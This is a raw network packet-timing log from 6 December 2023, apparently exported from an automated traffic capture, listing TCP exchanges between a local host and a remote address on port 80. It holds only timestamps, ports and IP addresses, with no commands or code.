                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:01.521655083 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:01.522250891 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:01.616259098 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.386810064 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.386840105 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.386861086 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.386897087 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.387182951 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.387232065 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.387346029 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.387485981 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.387530088 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.387619019 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.387692928 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.387737036 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.387768984 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.387866974 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.387917042 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.387999058 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.388073921 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.388092041 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.388128042 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.388221979 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.388262987 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.388297081 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.391741037 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.391789913 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.391794920 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.391882896 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.391922951 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.391932011 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.391995907 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.392034054 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.392066002 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.392169952 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.392206907 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.392256975 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.392318964 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.392355919 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.392385006 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.392421007 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.392458916 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.392505884 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.392524004 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.392560959 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.392581940 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.392628908 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.392668962 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.392685890 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.392751932 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.392791986 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.392813921 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.393052101 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.393091917 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.393676996 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.393791914 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.393835068 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.393884897 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.393949986 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.394078970 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.394087076 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.394186020 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.394227028 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.394273996 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.394357920 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.394398928 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.394417048 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.394452095 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.394491911 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.394514084 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.394551992 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.394588947 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.394639969 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.394721031 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.394757986 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.394784927 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.394881010 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.394918919 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.394951105 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.395028114 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.395066977 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.395175934 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.395258904 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.395297050 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.395313978 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.395374060 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.395421028 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.395423889 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.395489931 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.395509005 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.395531893 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.395580053 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.395620108 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.395639896 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.395709991 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.395750046 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.395761967 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.395838022 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.395854950 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.395879030 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.395910978 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.395951986 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.395968914 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.395973921 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.396202087 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.396399975 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.396450996 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.396539927 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.396608114 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.396644115 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.396691084 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.396770000 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.396804094 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.396852970 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.396897078 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.396931887 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.397102118 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.398164034 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.398200989 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.398235083 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.398313046 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.398346901 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.398430109 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.398497105 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.398531914 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.398578882 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.398662090 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.398699999 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.398729086 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.398818970 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.398855925 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.398932934 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.398953915 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.398987055 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.399068117 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.399148941 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.399183035 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.399230003 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.399317980 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.399413109 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.399439096 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.399472952 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.399514914 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.399544001 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.399643898 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.399681091 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.399712086 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.399840117 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.399873018 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.399880886 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.399969101 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.400011063 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.400057077 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.400127888 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.400166035 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.400218010 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.400301933 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.400355101 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.400377989 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.400477886 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.400515079 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.400547028 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.400665998 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.400702000 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.400808096 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.400859118 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.400893927 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.400904894 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.401009083 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.401045084 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.401089907 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.401164055 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.401200056 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.401242971 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.401333094 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.401369095 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.401400089 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.401514053 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.401547909 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.401609898 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.401691914 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.401732922 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.401781082 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.401866913 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.401911974 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.401987076 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.402084112 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.402120113 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.402152061 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.402255058 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.402291059 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.402328014 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.402419090 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.402455091 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.402481079 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.402556896 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.402594090 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.402663946 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.402698994 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.402715921 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.402736902 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.402766943 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.402812958 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.402832031 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.402879953 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.402879953 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.403326988 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.403346062 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.403383017 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.403383970 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.403403997 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.403426886 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.403440952 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.403444052 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.403462887 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.403481960 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.404216051 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.404237032 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.404257059 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.404283047 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.404318094 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.404320955 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.404340029 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.404372931 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.404373884 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.404397011 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.404437065 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.405153990 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.405283928 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.405322075 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.405354023 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.405379057 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.405417919 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.405438900 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.405457020 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.405473948 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.405478954 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.405487061 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.405515909 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.406228065 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.406248093 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.406284094 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.406296968 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.406315088 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.406333923 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.406349897 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.406368971 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.406388044 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.406413078 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.407186031 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.407207012 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.407227993 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.407280922 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.407299995 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.407316923 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.407320023 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.407355070 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.407390118 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.407411098 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.407454014 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.408097029 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.408145905 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.408165932 CET8049706104.21.73.195192.168.2.5
